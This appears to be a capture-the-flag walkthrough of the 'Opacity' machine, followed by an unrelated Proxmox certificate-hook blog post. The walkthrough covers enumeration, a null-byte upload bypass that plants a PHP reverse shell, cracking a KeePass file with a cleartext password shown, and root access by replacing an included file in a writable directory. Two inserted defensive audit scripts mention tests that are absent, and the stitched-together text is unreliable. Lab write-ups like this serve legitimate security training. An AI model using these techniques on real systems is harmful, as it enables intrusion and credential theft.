Opacity (Easy)

Opacity is a Boot2Root made for pentesters and cybersecurity enthusiasts.

Enumeration

Nmap

nmap -sC -sV -oN nmap-inital.txt $IP
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-10-22T07:50:10
|_  start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

From this we note that there is a login page, that the server is running PHP,
and that there is an SMB server running.

Let's start Gobuster to see if we can find anything else on the web server.

Gobuster

gobuster dir -w /opt/directory-list-2.3-medium.txt --url $IP
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 310] [--> http://10.10.21.236/css/]
/cloud                (Status: 301) [Size: 312] [--> http://10.10.21.236/cloud/]

The login page doesn't reveal anything interesting, and neither does /css. smbmap also doesn't reveal anything on the SMB shares.

The /cloud directory reveals a "5 Minute Upload" PHP application with an "External URL" field.
Some quick testing shows that it allows RFI, so I expect to be able to upload a PHP reverse shell.

Exploit

The RFI allows uploads from the attack machine. Uploads are stored in /cloud/images/ and are displayed immediately
after upload. The page appears to filter on image extensions.

/cloud/images/php-reverse-shell.php.jpg – uploads
/cloud/images/php-reverse-shell.php – fails to upload

A PHP null byte in the filename circumvents the extension check.

/cloud/images/php-reverse-shell.php#00 .jpg – uploads and executes the script successfully, giving a reverse shell as www-data.
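For the defending side, the upload directory above is exactly where a double-extension or null-byte trick leaves its trace: a file that carries a PHP extension somewhere in its name, or that does not start with an image signature. The following script is an added example, not code from the room or the application; it scans an upload directory and flags files that are not what their extension claims, using constructed sample files in the test.

```sh
#!/bin/sh
# scan_uploads.sh (constructed example): review an image upload directory for
# files that are not what their extension claims. A file is flagged when
#   - ".php", ".phtml" or ".phar" appears anywhere in its name (e.g. x.php.jpg),
#   - its first bytes are not a JPEG, PNG or GIF signature, or
#   - its content contains a PHP open tag.

magic_ok() {
    # Compare the first four bytes (as hex) with the known image signatures.
    sig=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
    case $sig in
        ffd8ff*)  return 0 ;;   # JPEG: FF D8 FF
        89504e47) return 0 ;;   # PNG:  89 'P' 'N' 'G'
        47494638) return 0 ;;   # GIF:  'G' 'I' 'F' '8'
    esac
    return 1
}

check_upload() {
    # Prints one "SUSPECT ..." line per finding; prints nothing for a clean file.
    f=$1
    name=$(basename "$f")
    case $name in
        *.php*|*.phtml*|*.phar*) echo "SUSPECT name: $name" ;;
    esac
    magic_ok "$f" || echo "SUSPECT magic: $name"
    grep -q '<?php' "$f" 2>/dev/null && echo "SUSPECT php-tag: $name"
    return 0
}

scan_uploads() {
    # Scans every regular file in the directory.
    # Returns 0 when the directory is clean, 1 when anything was flagged.
    found=0
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        out=$(check_upload "$f")
        if [ -n "$out" ]; then
            echo "$out"
            found=1
        fi
    done
    return $found
}
```

Run it as `scan_uploads /var/www/html/cloud/images` from cron or a file-integrity job; the extension check alone is the one the writeup bypasses, which is why the signature and content checks are there too.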

Enumeration v2

LinPEAS

LinPEAS reports vulnerable to CVE-2021-3560, but I don’t think that’s the objective of this machine.

Further down in the output I found dataset.kdbx in /opt/, which appears to be a KeePass database, and I
download it to the attack machine. John the Ripper ships keepass2john to extract a crackable hash from it.

keepass2john dataset.kdbx > dataset.hash
john --wordlist=/opt/rockyou.txt dataset.hash
741852963        (dataset)

Using kpcli I can open the database.

kpcli --kdb=dataset.kdbx
Provide the master password: *************************
kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root
kpcli:/Root> ls
=== Entries ===
0. user:password                                                          
kpcli:/Root> show 0

Title: user:password
Uname: sysadmin
 Pass: Cl0udP4ss40p4city#8700
  URL: 
Notes: 

kpcli:/Root> xp 0
Copied password for "user:password" to the clipboard.
sysadmin:Cl0udP4ss40p4city#8700

local.txt

We are now able to SSH into the box as the sysadmin user.

cat local.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

PrivEsc

There is a script in the sysadmin home that is owned by root and executes a backup job and some deletions. It is not in our crontab, so I'm expecting it's in root's. It will be our obvious point of attack.
The script itself is not writable, but the lib directory is, and the script includes a backup.inc.php file from that directory.
Simply uploading a reverse shell and moving it into the lib directory under the name backup.inc.php replaces the original: write permission on the directory is enough to replace an entry, even without write permission on the file itself. Then start your listener and wait for the cron job to fire.
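The root cause here is a root-run script that includes a file from a directory a less privileged user can write to. The following audit script is an added example, not part of the room or its backup script; it resolves the literal include/require paths in a PHP script and reports any included file, or parent directory, that is group- or world-writable. The directory layout in the test is constructed.

```sh
#!/bin/sh
# audit_includes.sh (constructed example): list the files a PHP script pulls in
# with include/require and flag any whose file or parent directory is group- or
# world-writable. Run it against scripts that root's crontab executes.
# Limitation: only literal quoted paths are resolved; a path built as
# __DIR__ . '/lib/x.php' would be misread as the absolute path /lib/x.php.

writable_by_others() {
    # Prints the path when its mode has the group-write (020) or other-write (002) bit.
    # find tests the mode bits, so the result is the same whether run as root or not.
    find "$1" -prune \( -perm -002 -o -perm -020 \) -print 2>/dev/null
}

audit_php_includes() {
    # Prints "WRITABLE: <path> (included via <spec>)" for each risky path.
    script=$1
    base=$(dirname "$script")
    grep -E '^[[:space:]]*(include|require)(_once)?[[:space:](]' "$script" |
    sed -nE "s/.*['\"]([^'\"]+)['\"].*/\1/p" |
    while read -r inc; do
        case $inc in
            /*) target=$inc ;;             # absolute include path
            *)  target=$base/$inc ;;       # relative to the script's directory
        esac
        for p in "$target" "$(dirname "$target")"; do
            [ -e "$p" ] || continue
            [ -n "$(writable_by_others "$p")" ] && echo "WRITABLE: $p (included via $inc)"
        done
    done
    return 0
}

includes_are_safe() {
    # Returns 0 when nothing was flagged, 1 otherwise.
    [ -z "$(audit_php_includes "$1")" ]
}
```

A writable parent directory is reported as well as a writable file, because replacing the directory entry is what the move in the writeup does.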

# cat proof.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Proxmox VE ACME/Certbot Hooks

Let's Encrypt certificates are an easy way to help secure your Proxmox VE installation. However, sometimes you want to use them for more. In my case, I had a local service that I also wanted to use the certificate for, but when the certificate renewed the service would not restart. ACME.sh has built-in hook functionality to solve this exact need, but unfortunately it's not easily accessed if you also want all the features of the Proxmox GUI and certificate management, since Proxmox handles all the calls to ACME and doesn't provide a method to hook into them.

Of course it would be possible to use ACME independently and then restart the needed PVE services, but I like to tinker and I wanted to find a way to go the other way: how can I keep the PVE certificate management and also restart my local service after renewal?

After a ton of Googling, I finally managed to find a solution. Proxmox VE calls the /usr/bin/pveupdate script to update certificates. This is just a Perl script, and if you scroll down you’ll find a $renew subroutine, with the lines:

print "Restarting pveproxy after renewing certificate\n";
PVE::Tools::run_command(['systemctl', 'reload-or-restart', 'pveproxy']);

So I took those and added:

print "Restarting myservice after renewing certificate\n";
PVE::Tools::run_command(['systemctl', 'reload-or-restart', 'myservice']);

A certificate renewal via the GUI now restarts my service afterwards. This functionality could be used to hook any type of action you need. The only downside is that this script needs to be updated each time Proxmox is updated. Not the most elegant solution, but it works.